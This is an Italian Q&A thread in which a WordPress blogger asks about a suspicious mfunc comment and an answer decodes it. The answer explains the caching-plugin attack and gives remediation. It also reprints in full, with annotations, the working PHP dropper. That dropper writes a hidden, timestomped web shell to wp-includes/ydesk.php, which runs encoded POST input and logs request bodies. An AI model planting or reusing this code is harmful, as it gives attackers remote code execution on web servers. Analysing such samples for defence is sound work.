Tentativo di hacking dei commenti di WordPress


Recentemente Akismet mi ha chiesto di moderare un possibile commento spam sul mio blog.

Era:

<!--mfunc eval(base64_decode("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")); --><!--/mfunc-->

Decodificato, il payload corrisponde a questo codice (qui il contenuto della stringa $src compare vuoto; la versione completa è riportata nella risposta): $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php'; $src = ''; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); @touch($file, $mtime, $mtime); @touch(dirname($file), $mtime, $mtime);

Non riesco a capire cosa stia cercando di fare l'attaccante. Qualcuno potrebbe spiegare cosa sta succedendo? Sul mio sito non esiste alcuno script ydesk.php (e infatti il codice decodificato non presuppone che esista: lo crea con fopen($file, 'w') e vi scrive il contenuto di $src).

    
posta Mastergalen 13.10.2013 - 14:09

1 risposta


Guardando il codice, è la prima fase di un attacco in più passaggi. Il tag mfunc non è un normale commento HTML: è il marcatore con cui alcuni plugin di caching per WordPress (WP Super Cache, W3 Total Cache) eseguivano PHP dinamico nelle pagine in cache e, nelle versioni vulnerabili, veniva valutato anche se arrivava in un commento di un visitatore. Se eseguito, il codice scrive una backdoor in wp-includes/ydesk.php (non in un file del tema) che esegue codice PHP arbitrario inviato via POST e registra su un file i dati ricevuti con Content-Encoding: binary.

Quindi, se usi temi o plugin WordPress di terze parti, controlla i loro file alla ricerca di righe di codice sospette; verifica inoltre che wp-includes/ydesk.php e un eventuale file tmpfile non esistano, aggiorna (o disattiva) il plugin di caching e assicurati che l'esecuzione dei tag mfunc sia disabilitata.

Se non usi un plugin di caching che interpreta i tag mfunc (o ne usi una versione aggiornata) e il file non è stato creato, il commento da solo non fa nulla: Akismet lo ha trattenuto in moderazione prima che venisse pubblicato.

Cheers!

<!--mfunc 
    // NOTE(review): attacker payload reproduced for analysis only. The mfunc wrapper is
    // not an ordinary HTML comment: it is the dynamic-PHP marker that WordPress caching
    // plugins (WP Super Cache, W3 Total Cache) evaluated when serving cached pages, and
    // vulnerable versions evaluated it even when it arrived inside a visitor comment.
    // Stage 1 (runs in the site's PHP process): build the path wp-includes/ydesk.php
    // relative to the executing script (presumably the WordPress root) and fill $src
    // with the PHP source of the backdoor that will be written there.
    $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php'; $src = '<?php
    @error_reporting(0);
    @ini_set("display_errors", 0);
    @ini_set("log_errors", 0);
    @ini_set("error_log", 0);
    if (isset($_GET['r'])) {
        print $_GET['r'];
    } elseif (isset($_POST['e'])) {
        eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
    } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
        $data = file_get_contents('php://input');
        if (strlen($data) > 0)
            print 'STATUS-IMPORT-OK';
        if (strlen($data) > 12) {
            $fp = @fopen('tmpfile', 'a');
            @flock($fp, LOCK_EX);
            @fputs($fp, $_SERVER['REMOTE_ADDR'] . "\t" . base64_encode($data) . "\r\n");
            @flock($fp, LOCK_UN);
            @fclose($fp);
        }
    }
    ?>'; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); @touch($file, $mtime, $mtime); @touch(dirname($file), $mtime, $mtime); 
    // The line above writes the dropped file, then copies the directory's mtime onto it
    // and restores the directory's own mtime, so date-sorted listings and naive
    // "recently modified files" checks do not reveal it. The fopen/fwrite results are
    // not checked; the @ only silences touch().
    // What the dropped file does (its source is the $src string above, which cannot be
    // annotated without changing the bytes written to disk):
    //   - disables error display and logging so failures leave no trace;
    //   - GET ?r=...  : echoes the parameter back, a liveness probe for the attacker
    //                   (and a reflected-output primitive);
    //   - POST e=...  : eval()s attacker-supplied PHP after undoing a layered
    //                   base64/rot13/strrev encoding, i.e. unrestricted remote code
    //                   execution on the web server;
    //   - Content-Encoding: binary : reads the raw request body, answers
    //                   STATUS-IMPORT-OK and appends "<client IP>\t<base64 body>" to a
    //                   file named 'tmpfile' in the current working directory; a drop
    //                   box whose intended use is not determinable from this code.
    // Remediation: remove wp-includes/ydesk.php and any 'tmpfile' if they exist, update
    // or disable the caching plugin so mfunc tags are no longer executed, and rotate
    // credentials if the backdoor was ever reachable.
    // exit stops further page processing once the file has been written.
    exit;
    ; --><!--/mfunc-->
    
risposta data 17.10.2013 - 19:22
